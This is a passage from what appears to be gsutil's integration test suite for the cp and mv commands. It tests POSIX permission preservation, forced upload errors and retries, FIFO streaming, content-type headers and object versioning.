GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test13': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_GID_ERROR
},
'test14': {
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '240',
error: POSIX_INSUFFICIENT_ACCESS_ERROR
}
}
# The first variable below can be used to help debug the test if there is a
# problem.
for test_name, attrs_dict in six.iteritems(test_params):
cls.ClearPOSIXMetadata(obj)
# Attributes default to None if they are not in attrs_dict; some attrs are
# functions or LazyWrapper objects that should be called.
uid = attrs_dict.get(UID_ATTR)
if uid is not None and callable(uid):
uid = uid()
gid = attrs_dict.get(GID_ATTR)
if gid is not None and callable(gid):
gid = gid()
mode = attrs_dict.get(MODE_ATTR)
cls.SetPOSIXMetadata(cls.default_provider,
bucket_uri.bucket_name,
obj.object_name,
uid=uid,
gid=gid,
mode=mode)
stderr = cls.RunGsUtil([
'cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj.object_name), tmpdir
],
expected_status=1,
return_stderr=True)
cls.assertIn(
ORPHANED_FILE, stderr,
'Error during test "%s": %s not found in stderr:\n%s' %
(test_name, ORPHANED_FILE, stderr))
error_regex = BuildErrorRegex(obj, attrs_dict.get(error))
cls.assertTrue(
error_regex.search(stderr),
'Test %s did not match expected error; could not find a match for '
'%s\n\nin stderr:\n%s' % (test_name, error_regex.pattern, stderr))
listing1 = TailSet(suri(bucket_uri), cls.FlatListBucket(bucket_uri))
listing2 = TailSet(tmpdir, cls.FlatListDir(tmpdir))
# Bucket should have un-altered content.
cls.assertEquals(listing1, set(['/%s' % obj.object_name]))
# Dir should have un-altered content.
cls.assertEquals(listing2, set(['']))
def TestCpMvPOSIXBucketToLocalNoErrors(cls, bucket_uri, tmpdir, is_cp=True):
"""Helper function for preserve_posix_no_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.stat(tmpdir).st_gid
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR)
gid = attrs_dict.get(GID_ATTR)
mode = attrs_dict.get(MODE_ATTR)
cls.CreateObject(bucket_uri=bucket_uri,
object_name=obj_name,
contents=obj_name.encode(UTF8),
uid=uid,
gid=gid,
mode=mode)
for obj_name in six.iterkeys(test_params):
# Move objects one at a time to avoid listing consistency.
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj_name), tmpdir])
listing = TailSet(tmpdir, cls.FlatListDir(tmpdir))
cls.assertEquals(
listing,
set([
'/obj1', '/obj2', '/obj3', '/obj4', '/obj5', '/obj6', '/obj7',
'/obj8', '/obj9', '/obj10'
]))
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj1'),
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj2'),
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj3'),
gid=primary_gid,
mode=0o440)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj4'),
gid=non_primary_gid,
mode=0o444)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj5'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj6'),
uid=USER_ID,
gid=primary_gid,
mode=0o420)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj7'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj8'),
uid=USER_ID,
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj9'),
uid=USER_ID,
gid=primary_gid,
mode=0o433)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj10'),
uid=USER_ID,
gid=non_primary_gid,
mode=0o442)
def TestCpMvPOSIXLocalToBucketNoErrors(cls, bucket_uri, is_cp=True):
"""Helper function for testing local to bucket POSIX preservation.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket to cp/mv to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.getgid()
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR, NA_ID)
gid = attrs_dict.get(GID_ATTR, NA_ID)
mode = attrs_dict.get(MODE_ATTR, NA_MODE)
if mode != NA_MODE:
ValidatePOSIXMode(int(mode, 8))
ValidateFilePermissionAccess(obj_name,
uid=uid,
gid=int(gid),
mode=int(mode))
fpath = cls.CreateTempFile(contents=b'foo', uid=uid, gid=gid, mode=mode)
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P', fpath,
suri(bucket_uri, obj_name)])
if uid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
UID_ATTR, str(uid))
if gid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
GID_ATTR, str(gid))
if mode != NA_MODE:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
MODE_ATTR, str(mode))
def _ReadContentsFromFifo(fifo_path, list_for_output):
with open(fifo_path, 'rb') as f:
list_for_output.append(f.read())
def _WriteContentsToFifo(contents, fifo_path):
with open(fifo_path, 'wb') as f:
f.write(contents)
class _JSONForceHTTPErrorCopyCallbackHandler(object):
"""Test callback handler that raises an arbitrary HTTP error exception."""
def __init__(self, startover_at_byte, http_error_num):
self._startover_at_byte = startover_at_byte
self._http_error_num = http_error_num
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Forcing HTTP error %s after byte %s. '
'%s/%s transferred.\r\n' %
(self._http_error_num, self._startover_at_byte,
MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise apitools_exceptions.HttpError({'status': self._http_error_num},
None, None)
class _XMLResumableUploadStartOverCopyCallbackHandler(object):
"""Test callback handler that raises start-over exception during upload."""
def __init__(self, startover_at_byte):
self._startover_at_byte = startover_at_byte
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise boto.exception.ResumableUploadException(
'Forcing upload start over', ResumableTransferDisposition.START_OVER)
class _DeleteBucketThenStartOverCopyCallbackHandler(object):
"""Test callback handler that deletes bucket then raises start-over."""
def __init__(self, startover_at_byte, bucket_uri):
self._startover_at_byte = startover_at_byte
self._bucket_uri = bucket_uri
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Deleting bucket (%s)' % (self._bucket_uri.bucket_name))
@Retry(StorageResponseError, tries=5, timeout_secs=1)
def DeleteBucket():
bucket_list = list(self._bucket_uri.list_bucket(all_versions=True))
for k in bucket_list:
self._bucket_uri.get_bucket().delete_key(k.name,
version_id=k.version_id)
self._bucket_uri.delete_bucket()
DeleteBucket()
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise ResumableUploadStartOverException('Artificially forcing start-over')
class _ResumableUploadRetryHandler(object):
"""Test callback handler for causing retries during a resumable transfer."""
def __init__(self,
retry_at_byte,
exception_to_raise,
exc_args,
num_retries=1):
self._retry_at_byte = retry_at_byte
self._exception_to_raise = exception_to_raise
self._exception_args = exc_args
self._num_retries = num_retries
self._retries_made = 0
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, unused_total_size):
"""Cause a single retry at the retry point."""
if (total_bytes_transferred >= self._retry_at_byte and
self._retries_made < self._num_retries):
self._retries_made += 1
raise self._exception_to_raise(*self._exception_args)
class TestCp(testcase.GsUtilIntegrationTestCase):
"""Integration tests for cp command."""
# For tests that artificially halt, we need to ensure at least one callback
# occurs.
halt_size = START_CALLBACK_PER_BYTES * 2
def _get_test_file(self, name):
contents = pkgutil.get_data('gslib', 'tests/test_data/%s' % name)
return self.CreateTempFile(file_name=name, contents=contents)
def _CpWithFifoViaGsUtilAndAppendOutputToList(self, src_path_tuple, dst_path,
list_for_return_value,
**kwargs):
arg_list = ['cp']
arg_list.extend(src_path_tuple)
arg_list.append(dst_path)
# Append stderr, stdout, or return status (if specified in kwargs) to the
# given list.
list_for_return_value.append(self.RunGsUtil(arg_list, **kwargs))
@SequentialAndParallelTransfer
def test_noclobber(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'bar')
@SequentialAndParallelTransfer
def test_noclobber_different_size(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'quux')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'quux')
def test_dest_bucket_not_exist(self):
fpath = self.CreateTempFile(contents=b'foo')
invalid_bucket_uri = ('%s://%s' %
(self.default_provider, self.nonexistent_bucket_name))
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil(['cp', fpath, invalid_bucket_uri],
expected_status=1,
return_stderr=True)
if self._use_gcloud_storage:
self.assertIn('not found: 404', stderr)
else:
self.assertIn('does not exist', stderr)
_Check()
def test_copy_in_cloud_noclobber(self):
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
stderr = self.RunGsUtil(
['cp', suri(key_uri), suri(bucket2_uri)], return_stderr=True)
# Rewrite API may output an additional 'Copying' progress notification.
self.assertGreaterEqual(stderr.count('Copying'), 1)
self.assertLessEqual(stderr.count('Copying'), 2)
stderr = self.RunGsUtil(
['cp', '-n', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertIn(
'Skipping existing item: %s' % suri(bucket2_uri, key_uri.object_name),
stderr)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_local_file_to_fifo(self):
contents = b'bar'
fifo_path = self.CreateTempFifo()
file_path = self.CreateTempFile(contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((file_path,), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_one_object_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents = b'bar'
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj_uri),), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_multiple_objects_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents1 = b'foo and bar'
contents2 = b'baz and qux'
obj1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents1)
obj2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents2)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj1_uri), suri(obj2_uri)), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn(contents1, list_for_output[0])
self.assertIn(contents2, list_for_output[0])
@SequentialAndParallelTransfer
def test_streaming(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-', '%s' % suri(bucket_uri, 'foo')],
stdin='bar',
return_stderr=True)
self.assertIn('Copying from <STDIN>', stderr)
key_uri = self.StorageUriCloneReplaceName(bucket_uri, 'foo')
self.assertEqual(key_uri.get_contents_as_string(), b'bar')
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_object(self):
bucket_uri = self.CreateBucket()
fifo_path = self.CreateTempFifo()
object_name = 'foo'
object_contents = b'bar'
list_for_output = []
# Start writer in the background, which won't finish until a corresponding
# read operation is performed on the fifo.
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(object_contents, fifo_path))
write_thread.start()
# The fifo requires both a pending read and write before either operation
# will complete. Regardless of which operation occurs first, the
# corresponding subsequent operation will unblock the first one.
# We run gsutil in a thread so that it can timeout rather than hang forever
# if the write thread fails.
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), suri(bucket_uri, object_name), list_for_output),
kwargs={'return_stderr': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn('Copying from named pipe', list_for_output[0])
key_uri = self.StorageUriCloneReplaceName(bucket_uri, object_name)
self.assertEqual(key_uri.get_contents_as_string(), object_contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_stdout(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(contents, fifo_path))
write_thread.start()
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), '-', list_for_output),
kwargs={'return_stdout': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip().encode('ascii'), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_stdout_to_fifo(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
list_for_gsutil_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=(('-',), fifo_path, list_for_gsutil_output),
kwargs={
'return_stderr': True,
'stdin': contents
})
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
def test_streaming_multiple_arguments(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(['cp', '-', '-', suri(bucket_uri)],
stdin='bar',
return_stderr=True,
expected_status=1)
self.assertIn('Multiple URL strings are not supported with streaming',
stderr)
# TODO: Implement a way to test both with and without using magic file.
@SequentialAndParallelTransfer
def test_detect_content_type(self):
"""Tests local detection of content type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(['cp', self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
if IS_WINDOWS:
self.assertTrue(
re.search(r'Content-Type:\s+audio/x-mpg', stdout) or
re.search(r'Content-Type:\s+audio/mpeg', stdout))
else:
self.assertRegex(stdout, r'Content-Type:\s+audio/mpeg')
_Check1()
self.RunGsUtil(['cp', self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
def test_content_type_override_default(self):
"""Tests overriding content type with the default value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check1()
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check2()
def test_content_type_override(self):
"""Tests overriding content type with a value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check2()
@unittest.skipIf(IS_WINDOWS, 'magicfile is not available on Windows.')
@SequentialAndParallelTransfer
def test_magicfile_override(self):
"""Tests content type override with magicfile value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil(['cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
use_magicfile = boto.config.getbool('GSUtil', 'use_magicfile', False)
content_type = ('text/plain'
if use_magicfile else 'application/octet-stream')
self.assertRegex(stdout, r'Content-Type:\s+%s' % content_type)
_Check1()
@SequentialAndParallelTransfer
def test_content_type_mismatches(self):
"""Tests overriding content type when it does not match the file type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
self.RunGsUtil(['-h', 'Content-Type:image/gif', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check3()
@SequentialAndParallelTransfer
def test_content_type_header_case_insensitive(self):
"""Tests that content type header is treated with case insensitivity."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil(['-h', 'content-Type:text/plain', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
self.assertNotRegex(stdout, r'image/gif')
_Check1()
self.RunGsUtil([
'-h', 'CONTENT-TYPE:image/gif', '-h', 'content-type:image/gif', 'cp',
fpath, dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertNotRegex(stdout, r'image/gif,\s*image/gif')
_Check2()
@SequentialAndParallelTransfer
def test_other_headers(self):
"""Tests that non-content-type headers are applied successfully on copy."""
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil([
'-h', 'Cache-Control:public,max-age=12', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta, 'cp', fpath, dst_uri
])
stdout = self.RunGsUtil(['ls', '-L', dst_uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
dst_uri2 = suri(bucket_uri, 'bar')
self.RunGsUtil(['cp', dst_uri, dst_uri2])
# Ensure metadata was preserved across copy.
stdout = self.RunGsUtil(['ls', '-L', dst_uri2], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
@SequentialAndParallelTransfer
def test_request_reason_header(self):
"""Test that x-goog-request-header can be set using the environment variable."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
# Ensure x-goog-request-header is set in cp command
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
# Ensure x-goog-request-header is set in ls command
stderr = self.RunGsUtil(['-D', 'ls', '-L', dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
@SequentialAndParallelTransfer
@SkipForXML('XML APIs use a different debug log format.')
def test_request_reason_header_persists_multiple_requests_json(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
# PUT follows GET request. Both need the request-reason header.
reason_regex = (r'Making http GET[\s\S]*'
r'x-goog-request-reason\': \'b/this_is_env_reason[\s\S]*'
r'send: (b\')?PUT[\s\S]*x-goog-request-reason:'
r' b/this_is_env_reason')
self.assertRegex(stderr, reason_regex)
@SequentialAndParallelTransfer
@SkipForJSON('JSON API uses a different debug log format.')
def test_request_reason_header_persists_multiple_requests_xml(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
reason_regex = (
r'Final headers: \{[\s\S]*\''
r'x-goog-request-reason\': \'b/this_is_env_reason\'[\s\S]*}')
# Pattern should match twice since two requests should have a reason header.
self.assertRegex(stderr, reason_regex + r'[\s\S]*' + reason_regex)
@SequentialAndParallelTransfer
def test_versioning(self):
"""Tests copy with versioning."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = urigen(k2_uri)
self.RunGsUtil(['cp', suri(k1_uri), suri(k2_uri)])
k2_uri = self.StorageUriCloneReplaceName(bucket_uri, k2_uri.object_name)
k2_uri = self.StorageUriCloneReplaceKey(bucket_uri, k2_uri.get_key())
g2 = urigen(k2_uri)
self.StorageUriSetContentsFromString(k2_uri, 'data3')
g3 = urigen(k2_uri)
fpath = self.CreateTempFile()
# Check to make sure current version is data3.
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Check contents of all three versions
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g1), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g2), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data2')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g3), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Copy first version to current and verify.
self.RunGsUtil(
['cp',
'%s#%s' % (k2_uri.versionless_uri, g1), k2_uri.versionless_uri])
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
# Attempt to specify a version-specific URI for destination.
stderr = self.RunGsUtil(['cp', fpath, k2_uri.uri],
return_stderr=True,
expected_status=1)
if self._use_gcloud_storage:
self.assertIn(
'destination argument of the cp command cannot'
' be a version-specific URL', stderr)
else:
self.assertIn('cannot be the destination for gsutil cp', stderr)
def test_versioning_no_parallelism(self):
"""Tests that copy all-versions errors when parallelism is enabled."""
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil([
'-m', 'cp', '-A',
suri(self.nonexistent_bucket_name, 'foo'),
